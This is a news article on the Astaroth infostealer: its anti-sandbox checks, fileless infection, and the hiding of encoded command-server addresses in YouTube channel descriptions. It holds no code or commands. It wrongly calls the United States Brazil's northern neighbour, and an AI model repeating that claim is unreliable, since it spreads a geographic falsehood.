Astaroth infostealer trojan hides command servers in YouTube channel descriptions


Astaroth – A malware that hides command servers in Google’s YouTube channel description

Over the past two years, Astaroth has emerged as a top malware that steals personal identifiable information including payment card data of the victim. According to security researchers, Astaroth one of today’s stealthiest malware strains, containing a slew of anti-analysis and anti-sandbox checks to prevent them from detecting its payload and analyzing it.

Insofar, the malware is only operated in Brazil but if the trend continues, Astaroth malware will spread to other countries soon. The malware was first noticed by IBM’s security researchers in Brazil in September 2018.  Cybereason researchers have analyzed Astaroth malware. Microsoft security team also took notice of the malware and analyzed its evolution in two separate blog posts, in July 2019 and March 2020.

In the latest Microsoft security blogpost, the researchers detail how Astaroth malware gained new features and new stealth capabilities.

Another security firm, Cisco has published a new report which says that the Astaroth malware is evolving and before long it will spread to other parts of the world. The trojan used email campaigns for distribution, fileless execution, and living off the land (LOLbins) techniques for infection.

However, now the Astaroth also gained two new major stealth techniques. It now has a quite large collection of anti-analysis and anti-sandbox checks. The malware runs these checks before it executes to make sure it runs on a real computer, and not inside a sandbox environment.

By avoiding sandboxing the Astaroth avoids having its operations analyzed. Thus the longer security researcher take to find an anti-virus for it, the longer it can continue infecting unaware victims. “Astaroth is evasive by nature and its authors have taken every step to ensure its success,” the Cisco Talos team said.

“They have implemented a complex maze of anti-analysis and anti-sandbox checks to prevent the malware from being detected or analyzed. Starting with effective and impactful lures, to layer after layer of obfuscation, all before any malicious intent was ever exposed. Then it finally proceeds through a rigorous gauntlet of checks for the tools and techniques of both researchers and sandbox technologies alike. “This malware is, by design, painful to analyze,” researchers added.

Astaroth now hides Command and Control servers in YouTube descriptions

Astaroth now hides Command and Control servers in YouTube descriptions

The second most important update that Astaroth got is hiding its command and control servers in the YouTube description of YouTube videos of Brazillian users. The above image is an illustration of such a server. This makes it doubly difficult for security researchers to analyze how it communicates with its makers.

According to Talos, once the Astaroth infects a victim, the trojan connects to a YouTube channel in which it posts the description in any YouTube video on the channel. The field contains encrypted and base64-encoded text with the URLs of its command and control server. Astaroth connects with the command and control server and sends the stolen information of the victim. Malware hiding the location of the C&C server on YouTube is not new. It’s been used before in 2015 by Janicab malware and in 2019 by Stantinko trojan.

However, Astaroth has gone one step further than this two malware. It now has redundancy capabilities. This means that it can now shift the C&C script in the YouTube video to another video if the video gets taken down.

For now, the Astaroth malware is active only in Brazil but researchers say that the sophistication of the malware allows them to spread wings to other parts of the world, especially to Brazil’s northern neighbor, United States.


About Author

"The Internet is the first thing that humanity has built that humanity doesn't understand, the largest experiment in anarchy that we have ever had." Eric Schmidt

Notify of
Inline Feedbacks
View all comments